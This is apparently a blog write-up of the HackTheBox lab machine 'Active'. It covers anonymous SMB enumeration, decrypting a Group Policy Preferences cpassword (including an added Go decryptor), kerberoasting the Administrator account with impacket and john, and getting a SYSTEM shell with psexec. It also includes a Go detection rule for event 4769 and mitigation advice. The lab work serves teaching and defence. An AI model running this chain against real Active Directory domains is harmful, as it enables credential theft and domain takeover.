December 8, 2023 | 23:42

HackTheBox - Active

Active from HackTheBox is an easy Windows box, in which we first find AD credentials in Group Policy Preferences and subsequently do a kerberoasting attack to get domain administrator.

Port Scanning

The open TCP ports indicate that we’re dealing with an AD domain controller running Windows Server 2008 R2:

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-05-02 11:16:18Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Port 47001 reveals the hostname dc.active.htb, which we can verify using nslookup:

$ nslookup dc.active.htb 10.10.10.100
Server:		10.10.10.100
Address:	10.10.10.100#53

Name:	dc.active.htb
Address: 10.10.10.100
Name:	dc.active.htb
Address: dead:beef::959a:4178:9349:6835

So we can add the following to /etc/hosts:

10.10.10.100	active.htb dc.active.htb

SMB Enumeration

Using SMBMap we can list the SMB shares along with the permissions:

$ smbmap -H 10.10.10.100 --no-banner
[...SNIP...]
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	NO ACCESS	Logon server share 
	Replication                                       	READ ONLY	
	SYSVOL                                            	NO ACCESS	Logon server share 
	Users                                             	NO ACCESS

We can anonymously access the Replication share, so we download all files off it recursively:

$ smbclient //10.10.10.100/Replication -N
[...SNIP...]
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
[...SNIP...]

There are several files within the active.htb folder:

$ find active.htb -type f
active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI
active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol
active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI
active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI

GPP Password

We are interested in the Groups.xml file, since these files may contain user account information including credentials:

$ cat active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

The file contains settings for the domain user SVC_TGS, one of which is the cpassword field, which holds the encrypted password. The AES key used to encrypt it was published by Microsoft, so we can decrypt the password with a tool that ships with Kali:

$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
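The decryption both gpp-decrypt and impacket's Get-GPPPassword perform, as an added Go example that is not code from the original post or from either tool: it assumes the AES-256 key Microsoft published in MS-GPPREF and an all-zero IV, and runs on the cpassword value from the Groups.xml above.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"encoding/hex"
	"fmt"
	"strings"
	"unicode/utf16"
)

// AES-256 key from MS-GPPREF 2.2.1.1.4 (assumed here): Microsoft published it, so the field hides nothing.
const gppKeyHex = "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"

// The cpassword value from the Groups.xml found on the Replication share.
const svcTGSCPassword = "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

// DecryptCPassword reverses the encoding chain: base64 with its '=' padding
// stripped -> AES-256-CBC with a zero IV -> PKCS#7 unpad -> UTF-16LE text.
func DecryptCPassword(cp string) (string, error) {
	cp += strings.Repeat("=", (4-len(cp)%4)%4) // restore base64 padding
	ct, err := base64.StdEncoding.DecodeString(cp)
	if err != nil {
		return "", err
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return "", fmt.Errorf("ciphertext length %d is not whole AES blocks", len(ct))
	}
	key, _ := hex.DecodeString(gppKeyHex)
	block, _ := aes.NewCipher(key)
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, make([]byte, aes.BlockSize)).CryptBlocks(pt, ct)
	pad := int(pt[len(pt)-1]) // check and strip PKCS#7 padding
	if pad == 0 || pad > aes.BlockSize ||
		!bytes.Equal(pt[len(pt)-pad:], bytes.Repeat([]byte{byte(pad)}, pad)) {
		return "", fmt.Errorf("bad PKCS#7 padding: not a GPP cpassword value")
	}
	pt = pt[:len(pt)-pad]
	u := make([]uint16, len(pt)/2) // plaintext is UTF-16LE
	for i := range u {
		u[i] = uint16(pt[2*i]) | uint16(pt[2*i+1])<<8
	}
	return string(utf16.Decode(u)), nil
}

func main() {
	pw, err := DecryptCPassword(svcTGSCPassword)
	fmt.Println(pw, err)
}
```

Because the key is fixed, the only fix is the one Microsoft shipped in MS14-025 (no more passwords in GPP) plus rotating any password that ever appeared in a cpassword field.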

There is also an impacket script, Get-GPPPassword, that bundles all of the work: it searches the share for Preferences XML files and decrypts any cpassword it finds:

$ impacket-Get-GPPPassword -share Replication 10.10.10.100
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Listing shares...
  - ADMIN$
  - C$
  - IPC$
  - NETLOGON
  - Replication
  - SYSVOL
  - Users

[*] Searching *.xml files...
[*] Found a Groups XML file:
[*]   file      : \\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
[*]   newName   : 
[*]   userName  : active.htb\SVC_TGS
[*]   password  : GPPstillStandingStrong2k18
[*]   changed   : 2018-07-18 20:46:06

Access more SMB Shares

We can also access more shares using these credentials:

$ smbmap -d active.htb -u svc_tgs -p GPPstillStandingStrong2k18 -H 10.10.10.100 --no-banner
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 10.10.10.100:445	Name: 10.10.10.100        	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	Replication                                       	READ ONLY	
	SYSVOL                                            	READ ONLY	Logon server share 
	Users                                             	READ ONLY

With that access, we can find the user flag:

$ smbclient //10.10.10.100/Users -U svc_tgs%GPPstillStandingStrong2k18
Try "help" to get a list of possible commands.
smb: \> dir
  .                                  DR        0  Sat Jul 21 16:39:20 2018
  ..                                 DR        0  Sat Jul 21 16:39:20 2018
  Administrator                       D        0  Mon Jul 16 12:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 07:06:44 2009
  Default                           DHR        0  Tue Jul 14 08:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 07:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 06:57:55 2009
  Public                             DR        0  Tue Jul 14 06:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 17:16:32 2018
smb: \> more svc_tgs\\desktop\\user.txt
87b[...SNIP...]

Kerberoasting

Having AD credentials, we can enumerate the AD users using impacket:

$ impacket-GetADUsers -all active.htb/svc_tgs -dc-ip 10.10.10.100   
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password: #GPPstillStandingStrong2k18
[*] Querying 10.10.10.100 for information about domain.
Name                  Email                           PasswordLastSet      LastLogon           
--------------------  ------------------------------  -------------------  -------------------
Administrator                                         2018-07-18 21:06:40.351723  2024-05-02 20:28:52.292542 
Guest                                                 <never>              <never>             
krbtgt                                                2018-07-18 20:50:36.972031  <never>             
SVC_TGS                                               2018-07-18 22:14:38.402764  2018-07-21 16:01:30.320277

We can use the impacket script GetUserSPNs to find kerberoastable users and, with -request, obtain a service ticket for each of them:

$ impacket-GetUserSPNs -request -dc-ip 10.10.10.100 active.htb/svc_tgs:GPPstillStandingStrong2k18 -outputfile hashes.kerberoast
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 21:06:40.351723  2024-05-02 20:28:52.292542

The hash within hashes.kerberoast can be cracked using john:

$ cat hashes.kerberoast  
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$1e21af024af5c4e[...SNIP...]
$ john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt hashes.kerberoast
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)     
1g 0:00:00:06 DONE (2024-05-02 17:28) 0.1447g/s 1524Kp/s 1524Kc/s 1524KC/s Tiffani1432..Tiago_18
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
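From the defender's side, the ticket request above leaves a trace in Security event 4769 on the DC: an RC4 (etype 0x17) service ticket for an SPN that belongs to a user account, here Administrator. As an added Go example that is not from the original post or from any tool it mentions, the rule below runs over constructed 4769 records written in a simplified key=value form; the field names follow the real event, while the sample values and the 10.10.14.2 client address are assumptions.

```go
package main

import (
	"fmt"
	"strings"
)

// Event holds the fields of a Security 4769 (TGS requested) event used here.
type Event struct {
	Account, Service, Client, Etype string
}
// ParseEvent reads a constructed "key=value; key=value" line into an Event.
func ParseEvent(line string) Event {
	f := map[string]string{}
	for _, kv := range strings.Split(line, ";") {
		if p := strings.SplitN(strings.TrimSpace(kv), "=", 2); len(p) == 2 {
			f[p[0]] = p[1]
		}
	}
	return Event{f["TargetUserName"], f["ServiceName"], f["IpAddress"], f["TicketEncryptionType"]}
}

// IsKerberoastCandidate matches the trace the request above leaves: an RC4 (etype 0x17)
// ticket for an SPN held by a user account, not a computer account ($) and not krbtgt.
func IsKerberoastCandidate(e Event) bool {
	svc := strings.ToLower(e.Service)
	return e.Etype == "0x17" && !strings.HasSuffix(svc, "$") && svc != "krbtgt"
}
// Flag returns one line per suspicious event, ready for an alert.
func Flag(lines []string) []string {
	var out []string
	for _, l := range lines {
		if e := ParseEvent(l); IsKerberoastCandidate(e) {
			out = append(out, fmt.Sprintf("%s requested an RC4 ticket for %s as %s", e.Client, e.Service, e.Account))
		}
	}
	return out
}

// Constructed sample events; the 10.10.14.2 client address is an assumption.
var sampleEvents = []string{
	"EventID=4769; TargetUserName=SVC_TGS@ACTIVE.HTB; ServiceName=DC$; IpAddress=::ffff:10.10.10.100; TicketEncryptionType=0x12",
	"EventID=4769; TargetUserName=SVC_TGS@ACTIVE.HTB; ServiceName=krbtgt; IpAddress=::ffff:10.10.14.2; TicketEncryptionType=0x17",
	"EventID=4769; TargetUserName=SVC_TGS@ACTIVE.HTB; ServiceName=Administrator; IpAddress=::ffff:10.10.14.2; TicketEncryptionType=0x17",
}

func main() {
	for _, f := range Flag(sampleEvents) {
		fmt.Println(f)
	}
}
```

The rule only stands out when AES is the norm, so service accounts still issuing RC4 tickets should be moved to AES; a long random password on any account holding an SPN is what makes the cracked hash useless.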

With psexec it’s possible to get a shell and read out the root flag:

$ impacket-psexec active.htb/Administrator:Ticketmaster1968@10.10.10.100                  
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[...SNIP...]
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> cd c:\users\administrator\desktop 
c:\Users\Administrator\Desktop> type root.txt
43e[...SNIP...]

The ADenum tool would have also helped in enumerating kerberoastable users:

$ python ADenum.py -d active.htb -ip 10.10.10.100 -u SVC_TGS -p "GPPstillStandingStrong2k18"

[*] Domain name:    active.htb
[*] Username:       SVC_TGS
[*] IP Address:     10.10.10.100
[!] SSL supported:  FALSE
[!] SSL connect:    FALSE

[+] Succesfully Authenticated With LDAP

[-] Authentication mechanism
[+] GSSAPI
[+] GSS-SPNEGO
[+] EXTERNAL
[!] DIGEST-MD5                         Consider as weak security protocols
[-] LOGIN                              Plaintext password
[-] PLAIN                              Plaintext password

====================================================
===================== Enum LDAP ====================
====================================================



[-] Users who are Domain Admin
[*] Username: Administrator            CN=Administrator,CN=Users,DC=active,DC=htb

[-] Domain Controllers
[*] Computer: DC$                      CN=DC,OU=Domain Controllers,DC=active,DC=htb
    [V] Windows Server 2008 R2 Standard 6.1 (7601)

[-] Users with Password Not Expire
[*] Username: Administrator            CN=Administrator,CN=Users,DC=active,DC=htb
[*] Username: Guest                    CN=Guest,CN=Users,DC=active,DC=htb
[*] Username: SVC_TGS                  CN=SVC_TGS,CN=Users,DC=active,DC=htb

[-] Users with old password
[!] Username: Administrator            Password last change: 2114 days ago 2018-07-18 19:06:40
[!] Username: krbtgt                   Password last change: 2114 days ago 2018-07-18 18:50:36
[!] Username: SVC_TGS                  Password last change: 2114 days ago 2018-07-18 20:14:38

[-] Users with an interesting description
[!] No entry found !

[-] Users with not the default encryption
[*] Username: Administrator            Password is in a reversible encryption or in DES !

[-] Protecting Privileged Domain Accounts
[!] No entry found !

[-] Not Default Attributes (TEST IN BETA)

[!] No entry found !

[-] Laps Password
[!] No entry found !


====================================================
==================== Attack AD =====================
====================================================


[-] AS-REP Roastable Users
[!] No entry found !

[-] Kerberoastable Users
[*] Username: Administrator            CN=Administrator,CN=Users,DC=active,DC=htb
[+] Hash added to file:                kerbHash.hash

[-] Starting to crack hashs
[!] No entry found !

© Pavel Pi 2021